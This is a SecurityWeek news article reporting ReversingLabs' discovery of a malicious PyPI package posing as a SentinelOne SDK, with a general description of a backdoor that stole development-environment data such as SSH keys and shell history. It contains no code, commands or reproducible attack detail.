Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Malicious PyPI Module Poses as SentinelOne SDK

Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne.

Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne.

The Python package was first uploaded on December 11 and received roughly 20 updates within the next two days. The module is completely unrelated to the legitimate threat detection firm, but abuses its brand reputation to attract unsuspecting victims.

Seemingly a fully-functional SentinelOne client – the malicious SDK appears built on top of legitimate SentinelOne code – the package contains backdoor code meant for data theft.

“This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler,” ReversingLabs, which calls the attack ‘SentinelSneak’, notes.

The malicious package contains two api.py files that engage in suspicious behavior such as enumerating files in a directory, executing a file, deleting a file/directory, and spawning a new process.

An analysis of the updates that the package received over the course of two days showed that only api.py files were modified. These are the only package modules to contain the malicious code.

The backdoor was designed to exfiltrate data specific to development environments, such as shell command execution history and the contents of the SSH folder, which stores SSH keys and configuration information, including login credentials for Git, Kubernetes, and AWS services.

The malware also lists folders in the root directory and sends all collected data to the command-and-control (C&C) server.

Advertisement. Scroll to continue reading.

The modifications made to the package show that the attackers attempted to adapt to targets by fine-tuning the backdoor to better work on multiple operating systems.

ReversingLabs says it observed five additional packages with similar naming variations, but those did not contain api.py files with malicious functionality. These packages were seen prior to December 11 and were likely meant for testing purposes.

“The malicious code appears designed to siphon sensitive information from development environments. Based on our analysis of the malware and the associated C&C infrastructure, it is unclear if this package was or is being used in active attacks against development environments, due to a lack of evidence found. The download stats suggest that the package has been downloaded more than 1,000 times,” ReversingLabs warns.

Related: Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware

Related: Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft

Related: New OpenSSF Project Hunts for Malicious Packages in Open Source Repositories

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.